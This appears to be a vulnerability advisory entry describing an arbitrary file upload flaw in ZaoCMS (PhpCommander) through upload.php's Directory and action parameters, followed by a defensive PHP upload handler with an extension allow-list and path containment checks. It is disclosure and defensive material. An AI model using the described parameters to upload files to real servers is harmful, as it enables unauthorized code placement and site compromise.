Vendor: PhpCommander
By: Qabandi
CVSS: 7.5 (HIGH)
Arbitrary File Upload
CWE: 434
Product Name: PhpCommander
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
ZaoCMS (PhpCommander) – Arbitrary File Upload
An attacker can upload a malicious file to the vulnerable application by accessing the upload.php page with the Directory parameter set to ./ and the action parameter set to upload. The malicious file can then be accessed from the documents folder.
Mitigation:
Configure the application to accept only files with the appropriate file extensions and to write uploaded files only to the appropriate directory.
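One way to apply both checks in a PHP upload handler, shown as an added example that is not PhpCommander's own code. The function names, the extension allow-list and the upload root passed in by the caller are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);

// Assumed allow-list for illustration; set it to the types the site really needs.
const ALLOWED_EXTENSIONS = ['pdf', 'png', 'jpg', 'jpeg', 'txt'];

/**
 * Hypothetical helper: returns a safe destination path inside $uploadRoot,
 * or null when the requested directory or the file extension is rejected.
 */
function resolveUploadTarget(string $uploadRoot, string $requestedDir, string $clientName): ?string
{
    $root = realpath($uploadRoot);
    if ($root === false) {
        return null;
    }
    // realpath() collapses "./", "../" and symlinks, so the comparison below
    // is made on the directory the file would actually land in.
    $dir = realpath($root . DIRECTORY_SEPARATOR . $requestedDir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($dir !== $root && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the upload root
    }
    // Only the final extension of the client-supplied name is trusted, and
    // only if it is on the allow-list. Comparison is case-insensitive.
    $name = basename(str_replace('\\', '/', $clientName));
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Store under a random name so the client never controls the on-disk
    // filename (this also discards inner extensions such as "x.php.jpg").
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Hypothetical entry point: $file is one element of $_FILES. */
function handleUpload(array $file, string $requestedDir, string $uploadRoot): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return false;
    }
    $target = resolveUploadTarget($uploadRoot, $requestedDir, (string) ($file['name'] ?? ''));
    // move_uploaded_file() refuses sources that did not arrive via HTTP POST upload.
    return $target !== null && move_uploaded_file((string) $file['tmp_name'], $target);
}
```

With this handler a Directory value of ./ still resolves to the upload root, but a file whose extension is not on the allow-list is refused, and any value that resolves outside the root is rejected before the file is moved.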